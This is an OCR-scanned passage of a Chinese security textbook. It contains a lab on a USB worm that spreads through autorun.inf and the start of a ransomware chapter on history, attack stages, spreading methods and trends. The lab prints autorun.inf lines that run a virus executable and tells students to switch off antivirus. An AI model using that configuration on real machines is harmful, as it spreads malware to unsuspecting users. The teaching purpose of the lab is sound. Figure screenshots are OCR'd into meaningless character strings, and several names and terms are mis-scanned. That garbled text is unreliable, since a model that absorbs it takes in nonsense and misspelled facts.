+ 所 -小 - 辐 | 我 搜索 号 文件 天 名 历史 | 噶 史 多 冶 | 
[局 本 地 而 笃 (cy) 可 0 
“下 [| 四 - -~ ~ ~ r 
Te ] | ] | | 时 
| 

Documents Inetpub = Program Fies WINDOWS test pg 


选 定 项 目 可 以 查看 其 说 明 。 


总 计 :7.98 GB 


国 已 用 空间 : 1,43 68 


(b) 下 载 后 


图 7-6 自动 下 载 文件 前 后 状态 对 比 
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7.5 综合 实验 
综合 实验 八 : 基于 UU 盘 传播 的 蠕虫 实验 


【实验 目的 】 

理解 U 盘 蠕 虫 病毒 的 传染 原理 。 

【实验 环境 】 

(1) VMWare Workstation 5.5.3。 

(2) Windows XP sp2。 

【病毒 原理 】 

U 盘 病 毒 通常 都 是 通过 给 U 盘 创 建 autorun. inf 文件 ,利用 Windows 系统 的 自动 播放 
功能 来 触发 病毒 程序 ,从 而 达到 传染 和 破坏 的 目的 。 

autorun. inf 文件 可 以 通过 以 下 命令 来 运行 病毒 程序 。 


Open = Virus, exe 


指定 设备 启用 时 运行 Virus. exe。 


ShellExecute = Virus. exe 


设备 启用 时 执行 文件 Virus. exe。 


Shell\XXX\command = Virus. exe 


当 用 户 在 右键 菜单 中 选择 X XxX XX 时 ,运行 Virus. exe。 

【实验 步骤 】 

(1) 实验 素材 : 在 本 书 配 套 素材 目录 experments\wormu 下 。 

(2) 检查 干净 的 计算 机 各 分 区 是 否 存在 autorun. inf 和 病毒 文件 virus. exe( 需 要 设置 显 
示 隐 藏 文件 和 系统 文件 等 选项 ) 。 

(3) 插入 含有 病毒 的 U 盘 ,U 盘 的 右键 菜单 出 现 “auto” 后 ,双击 U 盘 , 观 察 各 分 区 的 情 
况 ( 图 7-7) 。 

(4) 查看 autorun. inf 文件 内 容 。 其 内 容 如 下 。 


[AutoRun] 

open = uvirus. exe 

shellexecute = uvirus. exe 
shell\auto\command = uvirus. exe 


(5) 观察 病毒 触发 后 的 效果 ,如 图 7-8 所 示 。 

(6) 插入 干净 的 U 盘 , 观 察 U 盘 是 否 被 感染 。 

【实验 注意 事项 】 

(1) 实验 前 ,请 关闭 杀毒 软件 。 否 则 病毒 样本 会 被 自动 杀 除 。 

(2) 请 注意 操作 系统 的 版 本 。Windows XP Sp2 及 以 下 版 本 都 适用 。 

(3) 本 病毒 程序 用 于 实验 目的 ,请 妥善 使 用 。 

(4) 本 病毒 程序 具有 一 定 的 破坏 力 , 做 实验 时 注意 安全 ,推荐 使 用 虚拟 机 环境 。 
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回回 加 


文件 于 ) 编辑 人 查看 GO) 收 总 和 工具 位 ) 帮助 0 


@ 恒 -日 施 | Pas 已 xHx | 国 - 


文件 和 文件 夹 任务 和 ES 叫 ] Was 
让 玛 上 

加 8 如 一 人 新 文件 严 

@ THR 


忆 共 这 此 六 件 夫 


图 7-7 UU 盘 蠕 虫 病毒 已 经 感染 


编辑 区 ) 查看 名 收藏) 工具 CI) 帮助 


@ 右 - 日 - 仇 | Pas 也 xnx | 回 - 


文件 和 文件 卖 任务 


号 重 命名 这 个 文件 

让 移 这 个 文 件 

四 复审 这 个 文件 

全 作 这 个 文件 发 到 eb 

四 tat Dialoe 


开除 这 个 文件 


创建 日 期 :2010-10-17 22:24 大 小 : 164 井 


(a) 病毒 执行 提示 
图 7-8 UU 盘 蠕虫 病毒 执行 
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(b) 病毒 开始 运行 
图 7-8 ( 续 ) 
7.6 习 题 
一 、 填空 题 
蠕虫 病毒 的 主 程序 中 含有 传播 模块 ,传播 模块 的 入 侵 可 以 分 为 
和 3 个 步 又 ,以 实现 蠕虫 病毒 的 主动 人 侵 。 
二 、 选 择 题 
1. 下 列 计算 机 病毒 不 是 蠕虫 病毒 的 是 ( js 
A. 冲击 波 B. 振荡 波 GG CI D. 尼 姆 达 
2. 蠕虫 和 传统 计算 机 病毒 的 区 别 主 要 体现 在 ( NE, 
A. 存在 形式 B. 传染 机 制 C. 传染 目标 D. 破坏 方式 
三 、 思 考题 


1. 蠕虫 的 破坏 威力 是 非常 大 的 ,论述 蠕虫 病毒 的 破坏 主要 体现 在 哪些 方面 。 

2. 第 一 个 蠕虫 病毒 在 20 世纪 80 年 代 就 问世 了 , 试 分 析 为 什么 近 几 年 才 体 会 到 这 种 病 
毒 的 破坏 威力 。 

四 、 实 操 题 

掌握 基于 U 盘 传播 的 蠕虫 原理 ,并 执行 其 实验 步骤 。 
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从 2013 年 开始 ,不 法 人 员 借 助 恶 意 代码 或 者 黑客 手段 牟取 非法 利润 的 事件 屡屡 发 生 ， 
勒索 型 恶意 代码 是 这 类 手段 的 典型 代表 ,并 逐渐 发 展 成 黑客 动 持 用 户 设备 或 资产 的 常见 手 
段 之 一 。 近 年 来 ,勒索 攻击 事件 频 发 ,造成 了 巨大 的 经 济 损失 ,2016 年 平均 单 笔 勒 索 金额 高 
达 1077 美元 (Symantec 的 数据 )。2016 年 以 来 ,网 络 勒索 攻击 变 得 更 加 多 样 化 和 专业 化 ， 
大 量 的 专业 黑客 参与 其 中 。 

2013 年 至 今 ,勒索 型 恶意 代码 肆虐 横行 ,勒索 攻击 事件 愈演愈烈 。 从 PC 到 企业 服务 
器 ,从 Windows 平台 到 安 卓 智能 终端 ,甚至 一 度 自称 非常 安全 的 Mac OS X 也 遭受 勒索 型 
恶意 代码 的 危害 。 勒 索 型 恶意 代码 成 为 主要 网 络 安全 威胁 之 一 。 

第 一 个 真正 意义 的 勒索 型 恶意 代码 GPCoder 在 2005 年 出 现 ,其 将 用 户 计算 机 上 的 特 
定 类 型 文件 加 密 , 并 提示 用 户 联系 指定 的 邮箱 ,通过 购买 密 钥 来 解密 文件 。 近 两 年 ,勒索 型 
恶意 代码 愈 发 猩 铬 ,所 带 来 的 社会 影响 和 经 济 损失 也 备 受 关注 。 勒 索 型 恶意 代码 是 近年 数 
量 增加 最 快 的 安全 威胁 之 一 ,黑客 通常 为 隐藏 踪迹 而 要 求 用 户 以 电子 货币 方式 支付 赎金 ,以 
换取 解密 计算 机 数据 所 需 电 子 “ 密 钥 ”。 

本 章 对 勒索 型 恶意 代码 的 基本 概念 、 特 性 、 源 代码 分 析 、 代 码 实 践 ,防范 以 及 应 对 策略 进 
行 分 析 和 讲解 。 

本 章 学 习 目 标 

(1) 掌握 勒索 型 恶意 代码 的 概念 。 

(2) 掌握 勒索 型 恶意 代码 的 原理 。 

(3) 了 解 勒索 型 恶意 代码 的 危害 。 

(4) 掌握 勒索 型 恶意 代码 的 防范 技术 。 


8.1 勒索 型 恶意 代码 概述 


勒索 型 恶意 代码 是 一 种 以 勒索 为 目的 的 恶意 软件 一 一 黑客 使 用 技术 手段 劫持 用 户 设备 
或 数据 资产 ,并 以 此 为 条 件 向 用 户 勒 索 钱财 的 一 种 恶意 攻击 手段 。 

勒索 软件 (Ransomware) 是 典型 的 勒索 型 恶意 代码 ,通过 骚扰 ,恐吓 甚至 采用 绑架 用 户 
文件 等 方式 ,使 用 户 数据 资产 或 计算 资源 无 法 正常 使 用 ,并 以 此 为 条 件 向 用 户 勒 索 钱 财 。 这 
类 用 户 数据 资产 包括 文档 、 邮 件 、 数 据 库 、 源 代码 、 图 片 、 压 缩 文 件 等 多 种 文件 。 赎 金 形 式 包 
括 真 实 货币 、 比 特 币 或 其 他 虚拟 货 

勒索 软件 有 两 种 形式 , 即 数据 加 密 和 限制 访问 。 数 据 加 密 是 勒索 软件 最 常见 的 形式 。 
在 这 种 形势 下 ,勒索 软件 将 受害 者 机 器 上 的 数据 加 密 ,并 承诺 受害 者 缴纳 赎金 后 会 协助 其 将 
数据 恢复 。 另 一 种 形式 是 限制 访问 , 相 比 之 下 ,这 种 形式 不 影响 存储 在 设备 上 的 数据 。 相 
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反 , 它 们 阻挠 受害 者 访问 设备 (例如 , 安 卓 上 的 DoubleLocker 就 会 强制 锁 屏 ,使 用 户 无 法 使 
用 手机 ) ,向 受害 者 索要 赎金 ,并 显示 在 屏幕 上 。 勒 索 软 件 通常 会 伪装 成 权利 部 门 的 通知 , 报 
告 受害 人 非法 访问 了 网 页 内 容 , 并 说 明 他 们 必须 支付 罚款 。 


8.1.1 全 球 勒索 型 恶意 代码 


据 Symantec 2017 年 的 报告 ,2016 年, 防 病毒 软件 每 月 检测 到 的 勒索 软件 数量 呈现 小 
幅 增长 ,从 年 初 的 将 近 35 000 个 增 至 年 末 的 40 000 个 以 上 。 

2016 年 新 型 勒索 软件 家 族 种 类 增长 明显 。 勒 索 软 件 家 族 在 2014 年 和 2015 年 分 别 新 
增 30 种 ,2016 年 却 暴涨 3 倍 多 ,达到 101 种 。 这 种 趋势 表明 越 来 越 多 的 攻击 者 看 到 这 种 恶 
意 代码 的 获 利 功能 ,不 断 编 写 新 型 勒索 软件 或 修改 现 有 勒索 软件 (图 8-1(a) ) 。 

勒索 软件 变 体 数 量 ( 即 勒索 软件 家 族 的 不 同 变 体 ) 同 比 下 降 29% ,从 2015 年 的 342 000 
个 降 至 2016 年 的 241 000 个 。 这 种 下 滑 趋 势 从 月 度 新 型 勒索 软件 变 体 数量 中 可 见 一 斑 , 这 
个 平均 数量 从 2016 年 1 月 的 20 000 之 多 减少 到 年 底 的 不 足 20 000 个 。 新 型 勒索 软件 变 体 
数量 是 反映 勒索 软件 活动 总 量 的 一 个 指标 ,说 明 攻击 者 为 了 躲避 检测 而 不 断 改进 勒索 软件 。 
结合 2016 年 新 型 勒索 软件 家 族 的 大 幅 增加 来 看 , 变 体 数量 的 下 滑 也 能 说 得 通 。 这 表明 ,更 
多 的 攻击 者 正 选 择 从 零 开始 编写 新 型 勒索 软件 家 族 ,而 不 是 微调 现 有 的 勒索 软件 变 体 
(图 8-1(b))。 


120 400 000 
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(a) 家 族 数量 (b) 变种 量 


8-1 2014 一 2016 年 勒索 型 恶意 代码 变化 


8.1.2 勒索 型 恶意 代码 的 攻击 阶段 


勒索 攻击 一 般 分 为 3 个 阶段 ,其 中 包括 传播 感染 阶段 、 本 地 攻击 阶段 勒索 支付 阶段 。 

(1) 传播 感染 阶段 : 传播 阶段 的 技术 和 大 多 数 恶意 代码 没 区 别 ,主要 也 是 通过 电子 邮 
件 、 网 站 、U 盘 等 介质 将 恶意 程序 传输 到 目标 主机 上 ,并 伺机 执行 。 

(2) 本 地 攻击 阶段 : 勒索 型 恶意 代码 在 获得 运行 机 会 后 ,按照 恶意 代码 设 定 的 文件 类 型 
列表 对 用 户 磁盘 内 的 文件 系统 进行 扫描 ,并 对 能 够 处 理 的 文件 类 型 .磁盘 区 块 或 数据 库 进行 加 
密 , 甚 至 将 用 户 的 设备 锁定 ,主要 目的 是 使 用 户 不 能 如 平常 一 样 正常 使 用 设备 或 读 取 文件 。 

(3) 勒索 支付 阶段 : 在 被 攻击 的 计算 机 或 智能 终端 等 设备 上 留 下 勒索 信息 ,迫使 受害 
者 通过 勒索 信息 按照 攻击 者 的 支付 方式 要 求 来 进行 交付 赎金 ,也 就 是 购买 被 加 密 文件 的 解 
密 密 钥 或 被 锁定 设备 的 解锁 口令 。 
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8.1.3 勒索 型 恶意 代码 的 特性 


与 其 他 恶意 代码 相 比 较 , 勒 索 型 恶意 代码 的 显著 特性 就 是 勒索 ,因此 它 需要 带 有 一 个 能 
匿名 支付 赎金 的 模块 。 除 此 之 外 的 特性 就 和 其 他 恶意 代码 有 些 类 似 了 。 

1. 传播 方式 多 样 化 

勒索 型 恶意 代码 的 传播 方式 多 种 多 样 ,概括 为 如 下 几 种 。 其 中 ,最 常见 的 3 种 攻击 方式 
包括 网 页 挂 载 传播 .邮件 附件 漏洞 攻击 。 

(1) 钓鱼 邮件 。 攻 击 者 在 进行 病毒 传播 时 ,利用 社会 工程 学 手段 来 增加 可 信和 度 ,如 在 邮 
件 中 加 入 对 于 目标 用 户 的 身份 信息 ,并 通过 传输 文档 来 增加 用 户 对 于 附件 的 信任 度 , 并 且 利 
用 恶意 宏 代码 进行 攻击 。 

(2) 水 坑 攻击 。 在 网 页 中 注入 勒索 型 恶意 代码 ,浏览 该 网 站 的 人 群 可 能 会 被 勒索 型 恶 
意 代码 所 感染 ,从 而 造成 大 规模 的 影响 。 

(3) 漏洞 攻击 。 利 用 服务 器 的 漏洞 来 攻击 服务 器 文件 ,从 而 造成 较 大 的 影响 ,获取 较 高 
的 利润 。 以 XTBL 家 族 为 代表 的 散 诈 者 病毒 主要 采用 此 类 攻击 方式 。 

(4) 捆绑 传播 。 与 其 他 恶意 软件 拥 绑 传播 ,利用 其 他 恶意 代码 的 传播 能 力 , 把 勒索 型 恶 
意 代码 传播 出 去 。 

(5) 伪 尸 网 络 传播 。 一 方面 僵尸 网 络 可 以 发 送 大 量 的 垃圾 邮件 , 另 一 方面 伪 尸 网 络 为 
勒索 软件 即 服务 (RaaS) 的 发 展 起 到 了 支撑 作用 。 

(6) 可 移动 存储 介质 、 本 地 和 远程 的 驱动 器 传播 。 恶 意 软件 会 自我 复制 到 所 有 本 地 驱 
动 器 的 根 目录 中 ,并 成 为 具有 隐藏 属性 和 系统 属性 的 可 执行 文件 。 

(7) 文件 共享 网 站 传播 。 勒 索 软 件 存储 在 一 些小 众 的 文件 共享 网 站 ,等 待 用 户 点 击 链 
接 下 载 文件 。 

(8) 网 页 挂 载 传播 。 攻 击 者 把 勒索 软件 挂 载 在 某 些 网 站 上 。 当 用 户 不 小 心 访问 恶意 网 
站 时 ,勒索 软件 会 被 浏览 器 自动 下 载 并 在 后 台 运 行 。 

(9) 社交 网 络 传播 。 勒 索 软 件 以 社交 网 络 中 的 .jpg 图 片 或 者 其 他 恶意 文件 载体 传播 。 

2. 攻击 平台 多 样 化 


虽然 Windows 用 户 仍 是 勒索 软件 的 主要 攻击 目标 ,但 是 瞄准 其 他 平台 的 勒索 软件 攻击 
活动 也 在 与 日 俱 增 。 由 于 各 种 恶意 代码 编制 团伙 都 在 争 相 寻 找 未 被 利用 的 目标 群体 ,因此 
这 种 攻击 大 有 愈演愈烈 的 趋势 。 

(1) Windows 平台 。 温 无 目的 地 袭击 企业 和 个 人 用 户 的 大 规模 攻击 活动 是 当前 勒索 软 
件 攻击 的 最 突出 形态 。 大 部 分 攻击 团伙 都 只 想 感染 尽 可 能 多 的 计算 机 ,试图 狠 狠 地 大 捞 一 
笔 。 因 此 ,大 多 数 勒索 软件 变 体 都 意图 攻击 Windows 计算 机 ,这 导致 Windows 家 庭 用 户 仍 
是 最 大 受害 群体 之 一 。 与 企业 相 比 ,家 庭 用 户 使 用 的 安全 软件 的 质量 、 使 用 方法 都 有 所 欠 
缺 ,因此 他 们 的 计算 机 更 易 遭 受 攻击 。 尽 管家 庭 用 户 未 必 会 支付 高 额 赎金 ,但 是 潜在 受害 者 
的 庞大 数量 意味 着 犯罪 分 子 仍 可 从 中 牟取 暴利 。 当 然 ,攻击 家 庭 用 户 的 勒索 软件 同样 也 会 
对 企业 发 起 攻击 。 

(2) 安 卓 平台 。 随 着 智能 手机 的 普及 ,这 些 设备 自然 而 然 引 来 了 勒索 软件 攻击 者 的 关 
注 。 近 几 年 涌现 出 大 量 的 针对 Android 平台 的 威胁 ,其 中 绝 大 多 数 是 勒索 型 威胁 。2014 年 
4 月 ,知名 的 勒索 型 恶意 代码 Koler 就 是 针对 安 卓 平台 的 恶意 代码 。 

(3) Mac OS X。2016 年 3 月 ,KeRanger (OSX. Keranger) 威 胁 成 为 第 一 个 针对 Mac 
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OS X 操作 系统 的 勒索 软件 。KeRanger 主要 在 Transmission BitTorrent 客户 端的 受 感染 
版 本 安装 程序 中 传播 。 

(4) Linux 系统 平台 。Linux 系列 的 操作 系统 也 有 庞大 的 用 户 群 ,很 显然 ,勒索 型 恶意 
代码 的 作者 也 不 会 忘掉 Linux 平台 。2015 年 11 月 ,勒索 型 恶意 代码 Linux. Encoder. 1 针 
对 Linux 的 Web 服务 器 进行 攻击 。 

(5) 物 联网 设备 。 各 类 物 联网 设备 连接 互联 网 ,但 是 在 安全 防护 上 还 是 存在 许多 安全 
漏洞 ,因此 也 非常 容易 成 为 勒索 攻击 的 目标 。 

3. 本 地 攻击 手段 多 变 

(1) 加 密 数 据 库 新 型 勒索 攻击 。2015 年 有 一 种 名 为 RansomWeb 的 新 型 加 密 勒 索 , 专 
门人 侵 网 络 服务 器 ,修改 Web 读 写 数据 库 程 序 , 在 存 人 数据 时 进行 透明 加 密 ,在 读 取 数 据 时 
进行 透明 解密 ,并 且 只 对 关键 的 数据 库 表 进行 加 解密 ,而 在 一 定时 间 后 青 次 停止 解密 程序 。 
在 这 过 程 中 , 既 不 引起 管理 员 对 于 数据 库 异 常 的 注意 ,也 达到 了 对 于 大 量 数据 加 密 的 目的 。 

(2) 加 密 磁 盘 型 勒索 攻击 。2016 年 3 月 出 现 的 勒索 型 恶意 代码 Petya 不 仅 对 于 计算 机 
数据 加 密 , 还 对 硬盘 驱动 器 的 主 引 导 记 录 (MBR) 进 行 了 加 密 , 导 致 感染 的 计算 机 无 法 启动 
操作 系统 。 

(3) 新 型 勒索 病毒 攻击 方法 。 随 着 勒索 病毒 的 发 展 ,未 来 会 存在 许多 高 级 攻击 手段 。 
例如 ,把 勒索 代码 写 和 固件 ,即使 重 装 系统 也 无 法 清除 威胁 。 

4. 支付 方式 隐秘 

早期 的 勒索 型 恶意 代码 使 用 邮箱 或 账户 转账 的 方式 支付 赎金 ,而 如 今 , 改 用 比特 币 支 
付 。 其 中 比特 币 的 匿名 性 和 不 可 溯源 性 增强 了 攻击 者 的 隐秘 性 。 站 在 隐蔽 支付 的 角度 来 考 
察 勒索 型 病毒 ,会 发 现 比特 币 是 促进 勒索 型 恶意 代码 莲 勃 发 展 的 重要 推手 。 如 果 没 有 比特 
币 出 现 , 勒 索 组 织 不 敢 明目张胆 地 收取 赎金 。 


8.1.4 勒索 型 恶意 代码 出 现 的 原因 


勒索 型 恶意 代码 所 能 创造 的 利润 极 高 ,攻击 者 仅 需 通过 一 定 的 手段 传播 勒索 型 恶意 代 
码 ,造成 一 部 分 目标 机 器 感染 勒索 病毒 ,就 能 获取 非常 高 的 利润 。 勒 索 型 恶意 代码 的 成 本 
低 , 且 回报 高 , 且 比 特 币 支付 的 匿名 和 不 可 溯源 增长 了 勒索 型 恶意 代码 发 展 的 态势 。 随 着 传 
播 方式 的 改进 和 加 密 方 式 的 花样 百出 ,勒索 型 恶意 代码 所 带 来 的 危害 性 也 越 来 越 大 。 

造成 其 有 利 可 图 的 根本 原因 在 于 用 户 自身 不 注重 安全 防护 ,对 于 恶意 邮件 和 系统 漏洞 
等 没有 防护 意识 ,对 于 附件 和 链接 等 防范 心太 低 。 用 户 对 于 关键 数据 的 备份 率 过 低 ,也 是 造 
成 攻击 者 有 利 可 图 的 主要 原因 。 


8.2 ”勒索 型 恶意 代码 的 历史 与 现状 


8.2.1 勒索 型 恶意 代码 的 历史 


在 勒索 型 恶意 代码 出 现 以 前 ,数据 丢失 大 多 只 是 恶意 代码 活动 的 附带 危害 ,但 现在 情况 
发 生 了 变化 ,恶意 软件 与 破坏 数据 或 拒绝 访问 内 容 的 关联 变 得 前 所 未 有 的 直接 。 勒 索 型 亚 
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意 代码 改变 了 这 一 传统 模式 ,从 破坏 系统 转向 彻底 的 勒索 。 现 在 的 攻击 者 使 用 勒索 型 恶意 
代码 拒绝 人 们 访问 数据 或 系统 ,如 果 要 恢复 访问 , 则 需要 支付 赎金 。 

勒索 型 恶意 代码 随 着 互联 网 和 技术 发 展 正成 为 一 个 日 益 严重 的 问题 。 企 业 通常 认为 支 
付 赎 金 是 取 回 数据 最 划算 的 办 法 ,现实 情况 也 可 能 正 是 这 样 。 但 是 ,我 们 所 面临 的 问题 是 ， 
每 一 个 企业 为 了 取 回 其 文件 而 支付 的 赎金 ,会 直接 用 于 下 一 代 勒 索 型 恶意 代码 的 升级 和 开 
发 。 因 此 ,我 们 看 到 勒索 型 恶意 代码 正 以 惊人 的 速度 不 断 发 展 。 

1. 最 早 的 勒索 型 恶意 代码 

在 有 案 可 查 的 勒索 型 恶意 代码 中 ,最 早 的 实例 出 现在 1989 年 。 它 是 由 Joseph Poop 编 
写 的 ,在 发 作 时 会 用 对 称 加 密 算 法 加 密 被 攻击 者 系统 盘 上 的 所 有 文件 ,然后 要 求 被 攻击 者 给 
“PC Cyborg Corporation ”账号 汇款 。 这 个 恶意 代码 的 作者 号 称 是 通过 这 种 方式 为 AIDS 研 
究 筹 集资 金 ,但 他 却 开创 了 勒索 型 恶意 代码 的 先河 。 

2. 采用 非 对 称 加 密 的 勒索 型 恶意 代码 

在 1996 年 ,针对 当时 称 为 “密码 病毒 学 ”( 即 出 于 恶意 目的 使 用 密码 ) 的 课题 ,出 现 了 相 
关 的 研究 文章 。 研 究 人 员 创 造 出 一 种 概念 验证 病毒 ,能 够 使 用 RSA 和 TEA 算法 对 文件 进 
行 加 密 , 同 时 拒绝 访问 用 于 加 密 文 件 的 密 钥 。 到 了 2005 年 ,各 种 勒索 型 恶意 代码 纷 至 省 来 ， 
例如 ,Krotten、Archiveus、GPCoder 等 。 在 上 面 提 及 的 恶意 软件 系列 中 ,GPCoder 是 最 令 人 
感 兴趣 的 ,因为 在 众多 的 勒索 型 恶意 代码 中 , 它 在 加 密 文 件 时 使 用 的 是 1024 位 RSA 加 密 ， 
这 就 使 得 人 们 难以 通过 暴力 破解 的 方法 来 恢复 文件 。 

3. 国内 首 个 勒索 型 恶意 代码 

2006 年 出 现 的 Redplus 勒索 病毒 (Trojan/ Win32. Pluder) 是 国内 首 个 勒索 软件 。 该 病 
毒 会 隐藏 用 户 文档 ,然后 弹出 窗口 要 求 用 户 将 赎金 汇 入 指定 银行 账号 。2007 年 ,出 现 了 另 
一 个 国产 勒索 软件 QiaoZhaz, 该 病毒 运行 后 会 弹出 “发 现 您 硬盘 内 曾 使 用 过 盗版 了 的 我 公 
司 软件 ,所 以 将 您 部 分 文件 移动 到 锁定 了 的 扇 区 , 若 要 解锁 将 文件 释放 ,请 电邮 
“liugongs19670519(@yahoo. com. cn "购买 相应 软件 ”的 对 话 框 。 

4. 最 早出 现 的 Android 平台 勒索 病毒 

2014 年 4 月 下 名, 勒索 型 恶意 代码 陆续 出 现在 以 Android 系统 为 代表 的 智能 移动 平台 
上 ,而 较 早 出 现 的 为 Koler 家 族 (Trojan[rog,sys,fra]/Android. Koler) 。 该 家 族 主要 行为 
是 ,在 用 户 解 锁 屏 及 运行 其 他 应 用 时 ,会 以 手机 用 户 非法 浏览 色情 信息 为 由 ,反复 弹出 警告 
信息 ,提示 用 户 需 缴 罚款 ,从 而 向 用 户 勒索 高 额 赎金 。 

5. 最 早 的 Linux 平台 勒索 病毒 

恶意 代码 防范 软件 公司 Doctor Web 的 研究 人 员 发 现 了 一 种 新 的 勒索 型 恶意 代码 , 命 
名 为 Linux. Encoder. 1。 该 勒索 软件 是 针对 Linux 系统 的 恶意 软件 。 这 个 Linux 恶意 软件 
使 用 C 语言 编写 , 它 启 动 后 作为 一 个 守护 进程 来 加 密 数 据 , 以 及 从 系统 中 删除 原始 文件 ,使 
用 AES-CBC-128 对 文件 加 密 之 后 ,会 在 文件 尾部 加 上 . encrypted 扩展 名 。 

6. 最 具 规 模 的 勒索 型 恶意 代码 

在 2012 年, 出现 了 基于 ZeuS 和 CitadelReveton 木马 的 Reveton 恶意 代码 ,这 是 人 们 发 
现 的 第 一 个 大 规模 部 署 的 勒索 型 恶意 代码 。 此 恶意 代码 会 声称 其 代表 各 种 不 同 的 执法 部 
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门 。 受 害 者 的 系统 中 会 显示 一 份 通知 ,其 声称 某 个 执法 部 门 已 经 锁定 他 们 的 文件 ,受害 者 需 
要 缴纳 “罚金 ”才能 恢复 相关 的 文件 。Reveton 会 提示 用 户 购 买 现金 卡 或 比特 币 并 通过 网 站 
提交 相关 的 支付 信息 ,然后 才能 取 回 他 们 的 文件 。 

7. 传播 能 力 最 强 的 勒索 软件 

近年 来 ,勒索 型 恶意 代码 又 有 了 新 的 发 展 趋势 , 即 结合 蠕虫 的 传播 技术 。 如 前 面 的 章节 
所 述 ,蠕虫 是 独立 的 恶意 程序 , 它 复 制 自身 ,利用 系统 或 应 用 程序 的 漏洞 或 设计 缺陷 传播 到 
其 他 计算 机 上 。 它 通常 在 感染 一 个 受害 者 后 ,将 自己 复制 到 本 地 网 络 上 可 以 访问 的 每 台 计 
算 机 上 。 微 软 在 2016 年 5 月 发 现 首 个 可 以 从 一 台 计 算 机 传播 到 另外 一 台 计 算 机 的 勒索 型 
恶意 代码 “ZCryptor”。 一 旦 执行 “ZCryptor” 会 复制 一 些 文件 到 可 移动 驱动 器 ,确保 勒索 型 
恶意 代码 会 传输 到 下 一 台 主 机 。 

8. 感染 Mac OS 的 勒索 恶意 代码 

2016 年 3 月 ,KeRanger (OSX. Keranger) 成 为 第 一 个 针对 Mac OS 操作 系统 的 勒索 病 
毒 。 在 此 之 前 ,勒索 病毒 团伙 几乎 忽略 了 Mac OS 用 户 。KeRanger 主要 在 Transmission 
BitTorrent 客户 端的 受 感染 版 本 安装 程序 中 进行 传播 。KeRanger 与 现代 Windows 勒索 软 
件 行为 基本 相似 , 它 先 搜索 和 加 密 近 300 种 文件 类 型 ,然后 索要 1 比特 币 的 赎金 。 该 恶意 代 
码 经 有 效 Mac 开发 人 员 ID 签名 。 这 意味 着 KeRanger 可 以 绕 过 Mac OS 的 Gatekeepe 功 
能 ,因此 不 会 被 当 作 是 来 自 不 受信 任 源 的 软件 而 遭 到 拦截 。 随 后 , Apple 迅速 撤销 了 
KeRanger 使 用 的 开发 人 员 ID。 在 此 之 前 ,2015 年 11 月 ,巴西 网 络 安全 研究 员 Rafael Salema 
Marques 开发 了 称 为 Mabouia (OSX. Ransomcrypt) 的 概念 验证 (PoC) 勒 索 病 毒 。Marques 
此 举 旨 在 强调 Mac OS 计算 机 未 必 能 够 抵御 勒索 软件 。 

9. 可 感染 工控 设备 的 勒索 软件 

在 2017 年 旧金山 RSA 大 会 上 ,乔治 亚 理 工学 院 的 研究 员 向 人 们 展示 了 一 种 可 以 感染 
工控 设施 ,向 系统 传播 的 勒索 软件 ,名 为 LogicLocker。 它 可 以 改变 可 编程 逻辑 控制 器 
(PLCs) ,也 就 是 控制 关键 工业 控制 系统 (ICS) 和 监控 及 数据 采集 (SCADA) 的 基础 设施 。 通 
过 LogicLocker, 可 以 关闭 阀门 ,控制 水 中 氯 的 含量 并 在 机 器 面板 上 显示 错误 的 读数 。 


8.2.2 技术 发 展 趋势 


1. 攻击 量 逐 年 增长 

据 国 外 安全 机 构 的 统计 数据 : 自 2015 年 以 来 ,勒索 型 恶意 代码 在 全 球 的 攻击 量 疯 长 了 
3 倍 ,平均 每 40s 就 有 一 家 企业 被 感染 ; 平均 每 10s 就 有 一 个 无 就 者 中 招 。 在 2015 年 仅 一 
个 病毒 家 族 CryptoWall 获取 的 赎金 就 高 达 3. 25 亿美 元 ,如 今 全 球 肆 虐 着 超过 75 种 这 样 的 
病毒 家 族 ,该 病毒 涉及 的 黑色 产业 已 经 成 长 为 一 个 数 十 亿美 元 的 市 场 。 

2. 攻击 趋势 向 国内 蔓延 

2016 年 全 国 至 少 有 497 万 多 台 计 算 机 遭遇 了 勒索 型 恶意 代码 的 攻击 ,并 于 2016 年 下 
半年 达到 高 峰 。 该 年 度 的 单 日 攻击 次 数 超 2 万 次 ,被 感染 者 已 经 遍布 全 国 所 有 省 份 ,广东 被 
感染 计算 机 数量 最 高 , 占 全 国 被 感染 总 数 的 13. 2% ,其 次 是 江苏 9. 4% ,山东 5. 8%% ,北京 
“受灾 ”情况 较 低 ,但 也 有 约 16. 9 万 台 计 算 机 遭受 攻击 。 
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3. 攻击 者 “职业 素质 ” 愈 发 低下 

由 于 赎 回 文件 需要 国外 购买 比特 币 .Tor 浏览 器 等 国内 网 民 不 常 使 用 的 技术 ,再 加 上 项 
诈 者 反复 无 常 , 交 了 赎金 也 可 能 “ 撕 票 ”, 据 360 发 布 的 报告 显示 , 仅 16. 8% 的 受害 者 最 终 成 
功 恢 复 了 数据 , 绝 大 多 数 (83. 2%) 受 害 者 将 永远 失去 包括 办 公文 档 、 照 片 、 视 频 、 邮 件 、 聊 天 
记录 等 重要 数据 。 

4. 攻击 者 技术 门槛 降低 

以 往 的 恶意 代码 拼 的 是 技术 , 谁 用 的 技术 新 漏洞 危害 大 ,传播 得 就 广 ,恶意 代码 制作 者 
的 获 利 也 大 。 而 勒索 型 恶意 代码 是 将 有 几 十 年 历史 的 非 对 称 加 密 技 术 , 十 几 年 历史 的 Tor 
技术 ,七 八 年 历史 的 比特 币 技术 等 进行 排列 组 合 ,形成 新 的 技术 模式 。 这 些 技术 难度 低 ,很 
容易 被 复制 学 习 。 

5. 传播 模式 “创新 ” 

敲诈 者 还 在 传播 模式 上 不 断 “ 创 新 "。 之 前 国外 还 发 现 了 名 为 Popcorn Time 的 新 型 勒索 
型 恶意 代码 ,受害 者 想 解 密 除 了 支付 赎金 还 要 ”为 虎 作 化”, 需 要 向 其 他 人 发 送 恶意 链接 ,再 感 
染 至 少 两 名 新 的 受害 者 。 这 种 策略 就 像 “ 传 销 "一 样 ,将 越 来 越 多 的 无 束 者 拉 和 人 病毒 产业 黑 网 。 


8.2.3 最 新 勒索 型 恶意 代码 实例 


2016 一 2017 年 度 最 新 勒索 型 恶意 代码 如 下 。 

1. HadesLocker 

恶意 代码 分 析 系 统 捕 获 到 一 类 由 C# 语 言 编写 的 新 的 敲诈 勒索 木马 。 之 前 出 现 的 C# 
语言 编写 的 木马 只 是 简单 地 调用 了 一 些 C# 库 来 辅助 开发 。 与 之 相 比 ,这 次 的 变种 增加 了 
多 层 嵌 套 解 密 动态 反射 调用 等 复杂 手段 ,外 加 多 种 混淆 技术 ,提升 了 分 析 难 度 。 

